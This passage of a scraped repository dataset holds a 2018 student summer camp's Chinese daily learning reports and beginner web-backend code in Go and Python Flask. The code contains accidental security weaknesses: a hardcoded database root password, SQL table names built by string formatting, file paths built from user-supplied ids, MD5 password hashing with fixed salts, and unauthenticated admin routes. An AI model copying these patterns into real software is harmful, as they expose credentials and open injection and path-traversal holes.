"tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21\n\n生病发烧,修养一天\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.8034188151359558, "avg_line_length": 15.714285850524902, "blob_id": "8ed16430b474a5170ab30f5ff0cadbefcf09b0b7", "content_id": "9e7e0c28168ec21b5996be26f3262e13692d6ccb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 283, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/jackwener/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n\n早上看session部分知识,实现了下,没能实现,最后删+注释\n\n下午和晚上做了几个功能,不过管理员批准申请注册者和删除注册者差个前端post id的方法\n\n晚上听了赵澜的讲解后,感觉自己完全搞错路了......\n" }, { "alpha_fraction": 0.7675158977508545, "alphanum_fraction": 0.7834395170211792, "avg_line_length": 12.083333015441895, "blob_id": "bdbfbbdee027febea83b50997803009577098aa0", "content_id": "410d177172aed413b12b5a3c46784b4a8c848f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 622, "license_type": "no_license", "max_line_length": 54, "num_lines": 24, "path": "/yixiaoer/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n\n## 今日计划\n登陆及注册基本实现\n\n## 完成情况\n* golang处理json数据的编码与解码\n1. 编码先定义json结构体,再使用Marshal方法序列化\n2. 解码\n * 先定义结构\n * 调用Unmarshal方法序列化\n * 再通过断言可以访问数据(实现不成功otz)\n\n\n* login/signup等页面的功能实现通过pattern的不同来完成\n* 表单中radio的value数据的获取\n* postData函数的位置?表单还没有信息就传输?➡️所以js要放在一个函数里,onclick再进行操作\n\n\n\n\n又是什么都并没有实现的一天QAQ\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.851578950881958, "alphanum_fraction": 0.8736842274665833, "avg_line_length": 49.05263137817383, "blob_id": "0b41f41a741d894410ef3b6295b65258cd5a88ed", "content_id": "61733ec72813f039f8c49411d57746702837fecd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 261, "num_lines": 19, "path": "/jackwener/日报/总结.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 夏令营的总结\n\n> 时间可以说过的非常快了,20天转眼就没了\n\n很感谢冰岩能给这个机会参加这次的夏令营,并不是那种客气中的感谢,这次夏令营对于我来说意义可以说非常大吧。\n\n1. 知道了应该怎么去实践性学习| 整个大一应该说过的非常浑浑噩噩,感觉也没有过多的玩,但是总是感觉不知道该干什么,想学计算机知识,却又像个无头苍蝇到处撞,不知道怎么做些事情,不知道怎么正确的实践,说起来也好笑,都知道实践重要,但是又缺少那一下点拨,不知道怎么做,那些已经入门或者是进阶的人很难理解这种困惑,这次夏令营算是给了我个机会完整的体验了这种学习。现在想起来,如果早有机会的,或许自己根本也就不会走了很多让自己懊悔的弯路。\n\n2. 体验了一次好的经历| 这20天做的东西现在回过头来看可以说相当差了,做了很多无用功(也可以说是跳了很多坑),但是整个完成任务的流程体验给我非常好,即使我一天花了很多时间,结果在晚上写日报时写不出什么,我也仍然很享受这种过程。\n\n3. 习惯去解决问题| 我身上的很多习惯都不好,我自己是非常清楚的,我不喜欢解决问题,害怕麻烦,容易被困难打击的失去做下去的动力,大一的困局很多都源于此,没能去做新的尝试,一直围着几本书啃。这次夏令营的过程中,虽然还是因为受过一次打击摸过鱼,但相比于以前,已经很让自己满意了,多动脑多自己去解决问题,也是这次的收获之一\n\n4. 忘我远比坚持来的容易| 说实话,我一直很羡慕学校团队的中氛围和能接受到的引导,事实也是我认为的那样。我也还记得大一上学期的一个月,我给自己下了一个目标,把计网自顶向下看完,结果我每天看的甚是煎熬,每天规定看2-3小时,每次都是在煎熬中度过这2-3个小时,一旦看完,整个人如释重负,最后确实是煎熬的看完了,却不知道有什么效果,只能忘光,如果每次学习都是像这次夏令营那样,写着写着,肚子叫了,到了11.30/5.00了,该吃饭了,吃完了继续,感觉很轻松,很快乐,却又是如此容易的把之前难以做到事坚持了下来,还坚持了那么久\n\n5. 冰岩的大佬们人都非常的好,看到了一群很有趣的人。\n\n6. 以后争取每天都记录自己干了什么,日报挺好的\n\nIn short,这次夏令营非常快乐,也学到了非常多,希望这个暑假多努力,争取能做出冰岩的招新题。" }, { "alpha_fraction": 0.6648199558258057, "alphanum_fraction": 0.6888273358345032, "avg_line_length": 15.661538124084473, "blob_id": "558e59c0409ed2ced2a656e323c8add1bc4e112f", "content_id": "716ff87b9e303fc752a132edfb38b86b363a73c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1931, "license_type": "no_license", "max_line_length": 109, "num_lines": 65, "path": "/yixiaoer/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018.7.10日报\n\n## 今日计划\n1. CSS/javascript\n2. mangoBD\n3. echo\n\n\n## 完成情况\n### 关于**CSS**(描述网页的布局)\n* 选择器\n1. id选择器\n CSS中用\"#\",之后用id=\"xxx\"来对应(不要以数字开头\n2. class选择器\n CSS中用\".\",之后用“class=“xxx”来对应\n3. 属性选择器\n* 列表样式(各种属性)\n* 盒模型\n1. 用<div>封装周围的html\n2. 总元素的宽度=宽度+左填充+右填充+左边框+右边框+左边距+右边距\n3. 总元素的高度=高度+顶部填充+底部填充+上边框+下边框+上边距+下边距\n* 定位(顶部,底部,左侧和右侧属性定位)\n* 浮动(往往用于图像)\n\n\n### 关于**javascript**(网页的行为)\n* 只能在 HTML 输出中使用 document.write,如果在文档加载后使用该方法,会覆盖整个文档\n\n* 区分大小写,注释用\"//\"和\"/*\" 、 \" */\",不区分整数和浮点数\n\n* 通过<script>...</script>在hmtl中直接引入这个文件,或者把JavaScript代码放到一个单独的.js文件,并在HTML中通过<script src=\"...\"></script>引入这个文件\n\n* DOM操作(Document Object Model)(文档对象模型)(可以改变页面)\n\n* 作用域\n\n* 变量(数字,字符串)\n1. var来声明\n2. 变量字母开头,大小写敏感\n\n* 函数(前面含function)\n\n* 常见HTML事件\n1. onchange HTML 元素改变\n2. onclick 用户点击 HTML 元素\n3. onmouseover 用户在一个HTML元素上移动鼠标\n4. onmouseout 用户从一个HTML元素上移开鼠标\n5. onkeydown 用户按下键盘按键\n6. onload 浏览器已完成页面的加载\n\n* Fetch API\n1. 提供了一个获取资源的接口,核心在于对HTTP接口的抽象(实现了请求响应等方法)\n2. 传给后台数据,再then,再返回\n\n### 关于**mangoBD**\n* 后台进行,通过js传json获取数据,然后根据数据进行增(sign up),查(login)\n(数据库的操作)\n\n\n### 关于**echo**\n* cookie认证\n\n\nto be continued\n明日继续...\n" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.761904776096344, "avg_line_length": 7.400000095367432, "blob_id": "e8fcf9f69cbdb054e6058f2f024f4476e2bc4093", "content_id": "c129943a7b10ff2b60611d6cac47970408d6d432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "no_license", "max_line_length": 19, "num_lines": 5, "path": "/jackwener/日报/7.22.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.22日报\n\n看了些前端知识,关于jquery和js\n\n继续写任务,测试接口\n" }, { "alpha_fraction": 0.5446478128433228, "alphanum_fraction": 0.5812534689903259, "avg_line_length": 18.180850982666016, "blob_id": "b18c3a64643cdb26eec44b06b7998f095bf5419e", "content_id": "56a9796caf8a4feba4c01e57d11e7a60ae30cd37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3283, "license_type": "no_license", "max_line_length": 81, "num_lines": 94, "path": "/yixiaoer/日报/7.6.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018.7.6日报\n\n## 今日计划\n1. markdown\n2. 语言(Go)的学习\n3. 涉及知识的学习\n\n\n## 完成情况\n### 关于markdown\n* 了解markdown常用语法\n\n\n### 关于Go\n依据*Go官方中文教程*结合*官方链接*,*语言规范*进行了解与学习**\n* 某个名称在包外是否可见,就取决于其首个字符是否为大写字母\n\n* 关于import导入\n1. 直接用import导入包\n ``` Go\n import \"fmt\"\n ```\n 在多个包的情况下\n ``` Go\n import (\n \"fmt\"\n \"math\"\n )\n ```\n2. 用别名导入(或直接用点)\n ``` Go\n import a \"fmt\"//之后需要输入fmt的地方可以用a代替\n \n ```\n3. 非常迷的unused import\n 没有用的包直接导入不允许,可以加“_”强行导入\n\n* 关于函数\n1. 形参当有类型一致时,除最后一个必须标明外,其他可省\n2. 可以多值返回\n3. 声明变量(=赋值,:=声明并赋值(这种简短的声明只能在函数内部使用)\n4. 方法即函数,方法只是个带接受者参数的函数\n\n* 特殊常量iota\n1. 默认值为0,并逐步增(就算没有再次出现,每步都会增1,遇到一个const关键字时,才会被重置为0)\n 同一行,只计算一次\n ``` Go\n const (\n i, j,k = iota, iota, iota //输出i,j,k显示都是0\n )\n ```\n ``` Go\n const (\n a=iota //iota为0\n b=5 //iota为1\n c=iota //iota为2\n )\n const (\n d=4 //再次遇到const,iota为0\n e=iota //iota为1\n f=7\n ) //a,b,c,d,e,f输出是0,5,2,4,1,7\n ```\n2. 与<<什么的相结合\n\n* 关于流程控制语句\n1. type switch(取值不必为整数)\n2. for是唯一循环\n *for-select*\n \n\n* 函数闭包(类似C的递归\n* defer语句(先进后出,方便关闭)\n 当一个函数中存在多个defer语句时,它们携带的表达式语句的执行顺序一定是它们的出现顺序的倒序\n \n* 结构体\n1. 无论是数组还是指针都用\".\"来访问\n2. 不可用来比较大小,但可用来判断是否相等(此时逐项进行判断,相同即是项的顺序、名称、类型、标签都相同)\n\n* go语言切片(动态)(由 len() 获取长度,cap() 可以测量切片最长可以达到多少))\n1. go的一个数组变量表示整个数组,它不像c语言的数组是指向第一个元素的指针\n2. 切片通过两个下标来界定,即一个上界和一个下界(下界默认值为0),a[low : high],会选择一个半开区间,包括第一个元素,但排除最后一个元素\n ``` Go\n a := [6]int{2, 3, 5, 7, 11, 13}\n var s []int = a[1:4] // [1:4]则会选择数组a中下标为1,2,3的3个数;则若将b输出,b依次是3,5,7\n ```\n3. 用make函数定义func make([]T, len, cap) []T\n4. append( )函数增加之后切片容量是之前的2倍\n\n### 关于认证(???)\n- Cookie就是由服务器发给客户端的特殊信息,而这些信息以文本文件的方式存放在客户端,然后客户端每次向服务器发送请求的时候都会带上这些特殊的信息\n- session数据放在服务器上\nto be continued\n晚上继续...\n" }, { "alpha_fraction": 0.38999998569488525, "alphanum_fraction": 0.4300000071525574, "avg_line_length": 4.941176414489746, "blob_id": "778f581f12afa9caf19e8645b2c20d40b46a313f", "content_id": "e157aa0e05edb3669d717ea7b6a9f92807dc3fca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "no_license", "max_line_length": 13, "num_lines": 17, "path": "/Shixiaoyanger/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9日报\n**上午**\n---\nGo语言入门:基本语法\n\n---\n\n## **下午**\n\n1.Go语言入门:基本语法\n2.Go web学习\n\n\n---\n## **晚上**\n\n分享交流" }, { "alpha_fraction": 0.5759162306785583, "alphanum_fraction": 0.7041884660720825, "avg_line_length": 19.052631378173828, "blob_id": "e3590f4fde337d07d037f9f70997a51b543eceed", "content_id": "94d7433ee5fc4438f67422374f8ba85405e72a60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 556, "license_type": "no_license", "max_line_length": 100, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7日报\n**上午**\n---\n社会实践返程\n\n---\n\n## **下午**\n\n1. 学习git相关知识 \n学习资料来源:廖雪峰Git教程(https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000)\n2. linux 系统目录、文件目录、文件操作等。 \n 学习资料来源:linux菜鸟教程(http://www.runoob.com/linux/linux-tutorial.html)\n\n---\n## **晚上**\n\n数据库MySQL入门,但是没学很多,明天继续。\n学习资料来源:http://wiki.jikexueyuan.com/project/mysql-21-minutes/overview.html\n\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 6, "blob_id": "b56b5821293b95e6d54a4d22a6b8463c1917f9ab", "content_id": "a78f09a75e69a7f90aae2a17ae13b1025a13afd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14, "license_type": "no_license", "max_line_length": 7, "num_lines": 2, "path": "/Old-Li883/日报/7.5.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.5\nexample\n" }, { "alpha_fraction": 0.580563485622406, "alphanum_fraction": 0.5837290287017822, "avg_line_length": 18.993671417236328, "blob_id": "bc96b017ed1c479463f52bf4751526ab9910b3da", "content_id": "9787560c7a460e552c6fee5ddb564f2f0a1ef716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3263, "license_type": "no_license", "max_line_length": 59, "num_lines": 158, "path": "/yixiaoer/server/src/project1/controller/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"project/model\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/labstack/echo\"\n\t\"fmt\"\n)\n\n//func Request(c echo.Context) (err error) {\n//\tu := new(model.User)\n//\tif err = c.Bind(u); err != nil {\n//\t\treturn\n//\t}\n//\treturn c.JSON(http.StatusOK, u)\n//}\n\nfunc Login(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t\t\"password\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tfmt.Println(userInfo)\n\tvar u map[string]string\n\tif model.Login(userInfo) == 0 { //密码与账户匹配\n\t\tcookie := new(http.Cookie)\n\t\tcookie.Name = \"username\"\n\t\tcookie.Value = userInfo[\"name\"]\n\t\tcookie.Expires = time.Now().Add(24 * time.Hour)\n\t\tc.SetCookie(cookie)\n\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.Login(userInfo) == 1 { //有name但是pw不匹配\n\t\tu = map[string]string{\n\t\t\t \"status\":\"wrong pw\",\n\t\t}\n\t} else if model.Login(userInfo)==2{ //没有name\n\t\tu = map[string]string{\n\t\t\t\"status\": \"no user\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc SignUp(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",在数据库中会自动分配一个id所以在注册时可以不需要设置id\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t\t\"group\": \"\",\n\t\t\"identity\": \"\",\n\t\t\"status\": \"0\", //此时成员的状态还未被验证\n\t}\n\tc.Bind(&userInfo)\n\tfmt.Println(userInfo)\n\tvar u map[string]string\n\tif model.SignUp(userInfo) == 0 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 1 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"already have\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 2{\n\t\tu = map[string]string{\n\t\t\t\"status\": \"incomplete data\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc DeleteMember(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",\n\t\t//\"password\": \"\",\n\t\t//\"email\": \"\",\n\t\t//\"phone\": \"\",\n\t\t \"name\": \"\",\n\t\t//\"group\": \"\",\n\t\t//\"identity\": \"\",\n\t\t//\"status\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.DeleteMember(userInfo)\n\n\t\tu := map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc ShowGroup(c echo.Context) error {\n\t//Request(c)\n\tuserGroup := map[string]string{\n\t\t\"group\": \"\",\n\t}\n\tc.Bind(&userGroup)\n\tvar user []model.User\n\tuser = model.ShowGroup(userGroup)\n\tu := &user\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc GetInformation(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"information\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tvar member []model.User\n\tmember=model.GetInformation(userInfo)\n\tu :=&member\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc AddGroup(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",\n\t\t//\"password\": \"\",\n\t\t//\"email\": \"\",\n\t\t//\"phone\": \"\",\n\t\t \"name\": \"\",\n\t\t \"group\": \"\",\n\t\t//\"identity\": \"\",\n\t\t \"status\": \"1\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.AddGroup(userInfo)\n\treturn c.NoContent(http.StatusOK)\n}\n\nfunc ChangeInformation(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"id\": \"\",\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t\t\"group\": \"\",\n\t\t\"identity\": \"\",\n\t\t\"status\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.ChangeInformation(userInfo)\n\treturn c.NoContent(http.StatusOK)\n}\n" }, { "alpha_fraction": 0.5388383269309998, "alphanum_fraction": 0.5507347583770752, "avg_line_length": 27.203947067260742, "blob_id": "98f902635bfe34fc6ad70cb5ae2d5cb9bc8cfd03", "content_id": "1c0107db1a47062bd0fe9f365a2739442ea6584e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4903, "license_type": "no_license", "max_line_length": 105, "num_lines": 152, "path": "/Old-Li883/mall/model/merchant.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n商家操作\n注册商家\n注册,下架,查看物品\n修改自己,物品信息\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef m_register(id, password, email, addr):\n cursor.execute(\"select * from merchant where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into merchant(id,password,email,identify,addr) values(%s,%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n addr,\n ))\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef add_commodity(id, price, clss, photo, commodity_rest, merchant_id):\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() != (None): # 判断id是否已经存在\n return response(400, \"id has been used\")\n f1 = open(\n '/home/oldli/weblearning/flask/project/mall/photo/' + id + '.jpg',\n 'w') # 以wb形式打开若文件不存在则会自动生成\n f1.write(photo)\n f1.close()\n photo_path = '127.0.0.1/' + id + '.jpg' # 从前端传来文件的数据,存储在本地,前段再次调用时用nginx静态文件来获取\n cursor.execute(\n \"insert into commodity(id,price,cls,photo,commodity_rest,merchant_id) values(%s,%s,%s,%s,%s,%s)\",\n (\n id,\n price,\n clss,\n photo_path,\n commodity_rest,\n merchant_id,\n ))\n db.commit()\n return response(200)\n\n\ndef de_commodity(id, merchant_id):\n \"\"\" \n 商家下架商品\n 用户收藏商品下架提醒\n \"\"\"\n\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() != (None):\n cursor.execute(\"delete from commodity where id=%s and merchant_id=%s\",\n (id, merchant_id))\n db.commit()\n cursor.execute(\"select c_id from favourites where m_id=%s\",\n id) # 进入该用户的消息盒子,在下一次打开该用户是发送消息给这个用户\n for i in cursor.fetchall(): # 进入每个用户的消息盒子\n cursor.execute(\n \"insert into message%s(message) values('You favourite has obtained')\"\n % i[0])\n return response(200)\n else:\n return response(400, \"This commodity has not exist\")\n\n\ndef check_commodity(merchant_id):\n \"\"\"\n 查找这个商家的所有商品\n \"\"\"\n\n cursor.execute(\"select * from commodity where merchant_id=%s\", merchant_id)\n commodity = []\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef modify_merchant(id, password, email, addr):\n \"\"\"\n id作为唯一标识符,在这里不能被修改\n 这里不会有用户不存在的情况,因为必须先登录才可能修改资料\n \"\"\"\n cursor.execute(\n \"update merchant set password=%s,email=%s,addr=%s where id=%s\", (\n password,\n email,\n addr,\n id,\n ))\n db.commit()\n return response(200)\n\n\ndef modify_commodity(id, price, clss, photo, commodity_rest, merchant_id):\n \"\"\"\n 修改商品信息\n 这里的商家id不变,因为商品永远属于当前商家\n \"\"\"\n cursor.execute(\n \"select price from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n pri = cursor.fetchone()\n p = pri[0]\n if p > price:\n cursor.execute(\"select c_id from favourites where m_id=%s\",\n (id, )) # 进入该用户的消息盒子,在下一次打开该用户是发送消息给这个用户\n mem = cursor.fetchall()\n for i in mem: # 进入每个用户的消息盒子\n m = i[0]\n cursor.execute(\n \"insert into message%s(message) values('You favourite thing price reduced')\"\n % m) # mysql语句中不能乱加单引号\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() == (None): # 判断id是否存在\n return response(400, \"no this modity\")\n f1 = open('/home/oldli/weblearning/flask/project/mall/photo' + id + '.jpg',\n 'w') # 以wb形式打开若文件不存在则会自动生成,原来的数据会被抹去重新写\n f1.write(photo)\n cursor.execute(\n \"update commodity set price=%s,cls=%s,commodity_rest=%s where id=%s\", (\n price,\n clss,\n commodity_rest,\n id,\n ))\n db.commit()\n return response(200)\n" }, { "alpha_fraction": 0.6907545328140259, "alphanum_fraction": 0.6907545328140259, "avg_line_length": 25.885713577270508, "blob_id": "ac5246c8bf4c2b372d423702396d3a731a740873", "content_id": "955b92514132278e74a6e620325d6409d35909d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 951, "license_type": "no_license", "max_line_length": 78, "num_lines": 35, "path": "/Old-Li883/mall/views/administration_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.administration import a_register, identify, no_identity, prohibited\n\n\[email protected]('/api/administrator/register', methods=['post'])\ndef a_registration():\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n return a_register(id, password, email)\n\n\[email protected]('/api/administrator/identification', methods=['post'])\ndef identification():\n data = request.get_json()\n id = data['id']\n identity = data['identity']\n return identify(id, identity)\n\n\[email protected]('/api/administrator/noidentify')\ndef find_no_identify():\n return no_identity()\n\n\[email protected]('/api/administrator/prohibit')\ndef prohibit():\n data = request.get_json()\n id = data['id']\n identity = data['identity'] # 是哪个组的\n return prohibited(id, identity)\n" }, { "alpha_fraction": 0.5992779731750488, "alphanum_fraction": 0.6173285245895386, "avg_line_length": 14.416666984558105, "blob_id": "dfa1ec469e5bcee9cd976505375c5036b2083394", "content_id": "3571f611c9e1b63a9faa0d0177bf8f8d02960972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 602, "license_type": "no_license", "max_line_length": 39, "num_lines": 36, "path": "/jackwener/server/mall/encryptions/salt.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package encryptions\n\nimport (\n\t\"crypto/md5\"\n\t\"io\"\n\t\"fmt\"\n\t\"bytes\"\n\t\"encoding/hex\"\n)\n\nfunc Salt(password string) (string){\n\t// 计算密码MD5\n\tc := md5.New()\n\tio.WriteString(c, password)\n\tspw := fmt.Sprintf(\"%x\\n\", c.Sum(nil))\n\n\t// 指定两个(salt)\n\tsalt1 := \"@#$%\"\n\tsalt2 := \"^&*()\"\n\n\t// 拼接密码MD5\n\tbuf := bytes.NewBufferString(\"\")\n\n\t// 拼接密码\n\tio.WriteString(buf, salt1)\n\tio.WriteString(buf, spw)\n\tio.WriteString(buf, salt2)\n\n\t// 拼接密码计算MD5\n\tt := md5.New()\n\tio.WriteString(t, buf.String())\n\n\t// 输出\n\tfmt.Printf(\"%x\\n\", t.Sum(nil))\n\treturn hex.EncodeToString(t.Sum(nil))\n}" }, { "alpha_fraction": 0.7290836572647095, "alphanum_fraction": 0.7290836572647095, "avg_line_length": 21.909090042114258, "blob_id": "7b6be36858b5e53c4d2d9faf73981c6eb31306f3", "content_id": "acaeaaad1f6b0468ec70dab2ec5d7d491fdab434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 251, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/jackwener/server/练手/routers/index.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"hello/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc IndexInit() {\n\tbeego.Router(\"/\", &controllers.UserController{}, \"get:PageLogin;post:Login\")\n\tbeego.Router(\"/register\", &controllers.UserController{}, \"post:Register\")\n}" }, { "alpha_fraction": 0.5573333501815796, "alphanum_fraction": 0.5640000104904175, "avg_line_length": 15.666666984558105, "blob_id": "b33982f9e7825ee2935f44ece61e9e069f409c68", "content_id": "d02fb790f9fb5cda413d5ece82a4f43ec24f56d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1138, "license_type": "no_license", "max_line_length": 62, "num_lines": 45, "path": "/yixiaoer/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n\n## 今日计划\n1. 数据库基本操作\n2. 登陆及注册基本实现\n\n## 完成情况\n### 关于数据库\n* 增\n ```\n c := session.DB(\"A\").C(\"B\") //在数据库的A分支中创建一个B类\n err = c.Insert(&C) //在这个B类中加入数据C\n ```\n\n* 查\n ```\n c := session.DB(\"A\").C(\"B\") //数据库A分支的B类中\n\n var books []Book\n err := c.Find(bson.M{}).All(&C) //查找是否有C\n ```\n \n ```\n err := c.Find(bson.M{}).One(&C)\n ```\n\n* 删\n ```\n c := session.DB(\"store\").C(\"books\")\n err := c.Remove(bson.M{\"isbn\": isbn})\n ```\n* 改\n ```\n c := session.DB(\"store\").C(\"books\")\n err = c.Update(bson.M{\"isbn\": isbn}, &book)\n ```\n\n### 其他的一些莫名其妙的问题和记录\n* API就像是函数,封装好了一些方法\n* fetch由js进行,后端接收其中数据,通过json,但是emmm怎么处理QAQ(先强行知道叭,具体了解再说...)\n* form中的get/post和http,就可以直接通过这个传了吗(dei,但是传输也是json格式,所以还是要进行处理)\n\n低效且什么都不知道的一天OTZ😶\n明日继续\nto be continued👀\n" }, { "alpha_fraction": 0.7699999809265137, "alphanum_fraction": 0.800000011920929, "avg_line_length": 8, "blob_id": "344dddb2472622349e6e962a028b25d56a3ad301", "content_id": "0908adfcb5f23b39e1aa787911bb56a59e7a302a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 236, "license_type": "no_license", "max_line_length": 22, "num_lines": 11, "path": "/Shixiaoyanger/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n看了一部分session的内容\n\n今天赵楠给了建议后发现有些部分确实做得不够好\n\n今天又做了两件事\n\n一是看了一下go的与语言规范\n\n二是把原来杂乱的排版分了一下模块\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 3.6666667461395264, "blob_id": "dfa296f51ceb0a87424fefb8d4ab2ed2e77a747d", "content_id": "02f74aa759beb8569a81442257ef1416ab74cc28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/Old-Li883/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9\n\n忙于工程实训" }, { "alpha_fraction": 0.6903225779533386, "alphanum_fraction": 0.7064515948295593, "avg_line_length": 18.680850982666016, "blob_id": "96fbf2ab3ef92be1ef71e8cec0ab71ff4f61cc16", "content_id": "90a3efcb9e853a5e00a2fe000baff32d36fe7e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 104, "num_lines": 47, "path": "/yixiaoer/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n## 今日计划\n* 接口测试了解\n* go语言规范\n* echo框架(实现登录)\n\n## 完成情况\n### 了解接口测试\n1. 接口(一般指以下两种)\n * API:应用程序编程接口(程序间的接口(此处说的接口特指API))\n * GUI:图形用户界面(人与程序的接口)\n2. 接口的分类\n * HTTP接口(走HTTP协议,通过路径来区分调用的方法,请求报文入参有多种形式,返回报文一般为json串,最常见的是get和post方法)\n * Webservice接口\n * RESTful接口\n2. 